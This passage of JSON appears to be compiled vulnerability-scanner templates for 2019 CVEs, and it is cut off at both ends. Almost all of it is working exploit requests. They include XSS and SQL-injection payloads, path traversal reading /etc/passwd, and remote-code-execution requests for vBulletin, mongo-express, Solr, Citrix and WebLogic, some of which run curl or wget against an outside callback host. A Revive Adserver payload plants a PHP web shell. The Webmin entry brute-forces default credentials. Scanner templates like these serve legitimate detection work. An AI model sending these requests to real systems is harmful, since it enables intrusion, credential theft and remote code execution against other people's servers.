{{Host}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains((body_2), '{{randstr}}')"],"condition":"and"}]}]},{"id":"CVE-2019-13392","info":{"name":"MindPalette NateMail 3.0.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /NateMail.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nrecipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-16759","info":{"name":"vBulletin 5.0.0-5.5.4 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["addcc9f9f2f40e2e6aca3079b73d9d17"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10758","info":{"name":"mongo-express Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzcw==\nContent-Type: application/x-www-form-urlencoded\n\ndocument=this.constructor.constructor(\"return process\")().mainModule.require(\"child_process\").execSync(\"curl {{interactsh-url}}\")\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-2579","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","POST /cs/ContentServer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["value='' and '1'='0 --","Use this utility to view and manage URLs"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["NAME='_authkey_' VALUE='([0-9A-Z]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-20183","info":{"name":"Simple Employee Records System 1.0 - Unrestricted File Upload","severity":"high"},"requests":[{"raw":["POST /dashboard/uploadID.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337\n\n-----------------------------5825462663702204104870787337\nContent-Disposition: form-data; name=\"employee_ID\"; filename=\"poc.php\"\nContent-Type: image/png\n\n\n-----------------------------5825462663702204104870787337--\n","GET /uploads/employees_ids/{{endpoint}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["1ad0d710225c472cb7396b3c1d97e4dd"]}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?:[a-zA-Z0-9+\\/])*_poc.php"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-3799","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12986","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/trace_route HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Citrix SD-WAN\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-19411","info":{"name":"Huawei Firewall - Local File Inclusion","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/umweb/../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17538","info":{"name":"Jiangnan Online Judge 0.8.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3403","info":{"name":"Jira - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/2/user/picker?query="],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","contains_any(body, \"\\\"users\\\":\",\"\\\"usuario\\\":\")","contains_all(body, \"\\\"total\\\":\", \"\\\"header\\\":\")","status_code == 200 || status_code == 404"],"condition":"and"},{"type":"word","part":"body","words":["total\":0"],"negative":true}]}]},{"id":"CVE-2019-19908","info":{"name":"phpMyChat-Plus 1.98 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username = \""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11013","info":{"name":"Nimble Streamer <=3.5.4-9 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5418","info":{"name":"Rails File Content Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Accept":"../../../../../../../../etc/passwd{{"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-14251","info":{"name":"T24 Web Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd","{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10692","info":{"name":"WordPress Google Maps <7.11.18 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_login\"","\"user_pass\"","\"user_nicename\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16332","info":{"name":"WordPress API Bearer Auth <20190907 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/api-bearer-auth/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10405","info":{"name":"Jenkins <=2.196 - Cookie Exposure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","JSESSIONID"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2019-5434","info":{"name":"Revive Adserver 4.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /adxmlrpc.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\n openads.spc remote_addr 8.8.8.8 cookies a:1:{S:4:\"what\";O:11:\"Pdp\\Uri\\Url\":1:{S:17:\"\\00Pdp\\5CUri\\5CUrl\\00host\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:55:\"plugins/3rdPartyServers/ox3rdPartyServers/max.class.php\";S:13:\"\\00*\\00filesystem\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:66:\"x://data:text/html;base64,PD9waHAgc3lzdGVtKCRfR0VUWyIwIl0pOyA/Pg==\";S:13:\"\\00*\\00filesystem\";O:29:\"League\\Flysystem\\MountManager\":2:{S:14:\"\\00*\\00filesystems\";a:1:{S:1:\"x\";O:27:\"League\\Flysystem\\Filesystem\":2:{S:10:\"\\00*\\00adapter\";O:30:\"League\\Flysystem\\Adapter\\Local\":1:{S:13:\"\\00*\\00pathPrefix\";S:0:\"\";}S:9:\"\\00*\\00config\";O:23:\"League\\Flysystem\\Config\":1:{S:11:\"\\00*\\00settings\";a:1:{S:15:\"disable_asserts\";b:1;}}}}S:10:\"\\00*\\00plugins\";a:1:{S:10:\"__toString\";O:34:\"League\\Flysystem\\Plugin\\ForcedCopy\":0:{}}}}}}} 0 dsad 1 0 1 \n","GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/html"]},{"type":"regex","part":"body_2","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17574","info":{"name":"Popup-Maker < 1.8.12 - Broken Authentication","severity":"critical"},"requests":[{"raw":["GET /?pum_action=tools_page_tab_system_info HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npopmake_action=popup_sysinfo&popmake-sysinfo=CVE-2019-17574\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Popup Maker Configuration","Webserver Configuration"],"condition":"and"},{"type":"word","part":"body_2","words":["CVE-2019-17574"]}]}]},{"id":"CVE-2019-1943","info":{"name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"server","words":["GoAhead-Webs"]},{"type":"regex","part":"header","regex":["(?i)Location:\\shttps?:\\/\\/interact\\.sh/cs[\\w]+/"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2019-8086","info":{"name":"Adobe Experience Manager - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /content/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nsling:resourceType=fd/af/components/guideContainer\n","POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nguideState={\"guideState\"%3a{\"guideDom\"%3a{},\"guideContext\"%3a{\"xsdRef\"%3a\"\",\"guidePrefillXml\"%3a\"\\u0041\\u0042\\u0043\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ABC"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12461","info":{"name":"WebPort 1.19.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-7315","info":{"name":"Genie Access WIP3BVAF IP Camera - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12314","info":{"name":"Deltek Maconomy 2.2.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16313","info":{"name":"ifw8 Router ROM v4.31 - Credential Discovery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/action/usermanager.htm"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\*\\*\\*\\*\\*\\*<\\/td>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\\*\\*\\*\\*\\*\\*<\\/td>"],"part":"body"}]}]},{"id":"CVE-2019-6802","info":{"name":"Pypiserver <1.2.5 - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"],"matchers":[{"type":"regex","part":"header","regex":["^Set-Cookie: crlfinjection=1;"]}]}]},{"id":"CVE-2019-8449","info":{"name":"Jira <8.4.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"users\":{\"users\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18922","info":{"name":"Allied Telesis AT-GS950/8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15642","info":{"name":"Webmin < 1.920 - Authenticated Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nCookie: redirect=1; testing=1\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nAccept-Encoding: gzip, deflate\n\nuser={{username}}&pass={{password}}\n","POST /rpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{RootURL}}/sysinfo.cgi?xnavigation=1\nAccept-Encoding: gzip, deflate\n\nOBJECT Socket;print \"Content-Type: text/plain\\n\\n\";$cmd={{cmd}};print \"$cmd\\n\\n\";\n"],"attack":"pitchfork","payloads":{"username":["admin","root"],"password":["admin","root"]},"stop-at-first-match":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_2","regex":["uid=(\\d+)\\(.*?\\) gid=(\\d+)\\(.*?\\) groups=(\\d+)\\(.*?\\)"]},{"type":"word","part":"body_2","words":["Content-type: text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16931","info":{"name":"WordPress Visualizer <3.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-json/visualizer/v1/update-chart HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": 7, \"visualizer-chart-type\": \"\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":\"Chart updated\"}"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7609","info":{"name":"Kibana Timelion - Arbitrary Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/timelion/run"],"body":"{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}","headers":{"Content-Type":"application/json; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["seriesList"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14750","info":{"name":"osTicket < 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /upload/setup/install.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ns=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo\n","GET /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1\n","GET /upload/scp/settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["","getConfig().resolve"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-17418","info":{"name":"MetInfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11581","info":{"name":"Atlassian Jira Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ContactAdministrators!default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Contact Site Administrators"]},{"type":"word","part":"body","negative":true,"words":["has not yet configured this contact form"]},{"type":"regex","part":"body","regex":["\\(v4\\.4\\.","\\(v5\\.","\\(v6\\.","\\(v7\\.[012345789]\\.","\\(v7\\.1[0-2]\\.","\\(v7\\.6\\.([0-9]|[1][0-3])","\\(v7\\.\\13\\.[0-4]","\\(v8\\.0\\.[0-2]","\\(v8\\.1\\.[0-1]","\\(v8\\.2\\.[0-2]"],"condition":"or"}]}]},{"id":"CVE-2019-0193","info":{"name":"Apache Solr DataImportHandler <8.2.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/x-www-form-urlencoded\nX-Requested-With: XMLHttpRequest\n\ncommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-3396","info":{"name":"Atlassian Confluence Server - Path Traversal","severity":"critical"},"requests":[{"raw":["POST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nReferer: {{Hostname}}\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["contextConfigLocation"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11248","info":{"name":"Debug Endpoint pprof - Exposure Detection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/debug/pprof/","{{BaseURL}}/debug/pprof/goroutine?debug=1"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["Types of profiles available:","Profile Descriptions","goroutine profile: total"],"condition":"or"}]}]},{"id":"CVE-2019-17662","info":{"name":"ThinVNC 1.0b1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["User=","Password="],"condition":"and"},{"type":"word","part":"header","words":["application/binary"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2767","info":{"name":"Oracle Business Intelligence Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["GET /xmlpserver/convert?xml=<%3fxml+version%3d\"1.0\"+%3f>%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-20141","info":{"name":"WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/autosuggest-remote.php?q=\">","{{BaseURL}}/admin/data/autosuggest-remote.php?q=\">"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[">>)1(trela=rorreno"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-1010290","info":{"name":"Babel - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-3402","info":{"name":"Jira < 8.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'' does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13101","info":{"name":"D-Link DIR-600M - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wan.htm HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/PPPoE/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1898","info":{"name":"Cisco RV110W RV130W RV215W Router - Information leakage","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_syslog.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(to_lower(body), \"ethernet\") && contains(to_lower(body), \"connection\")","contains(header, \"application/octet-stream\")"],"condition":"and"}]}]},{"id":"CVE-2019-15829","info":{"name":"Gallery Photoblocks < 1.1.43 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"\")","contains(body_2, \"post galleries!\")"],"condition":"and"}]}]},{"id":"CVE-2019-8451","info":{"name":"Jira <8.4.0 - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/plugins/servlet/gadgets/makeRequest"],"body":"url=https://{{Host}}:443@{{interactsh-url}}\n","headers":{"X-Atlassian-Token":"no-check","Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-3401","info":{"name":"Atlassian Jira <7.13.3/8.0.0-8.1.1 - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular"],"matchers":[{"type":"word","words":["","Manage Filters - Jira"],"condition":"and"}]}]},{"id":"CVE-2019-12276","info":{"name":"GrandNode 4.40 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"],"headers":{"Connection":"close"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18665","info":{"name":"DOMOS 5.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16997","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nappno= 1 union SELECT 98989*443131,1&editor=cn&site=web\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2729","info":{"name":"Oracle WebLogic Server Administration Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\nxxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSD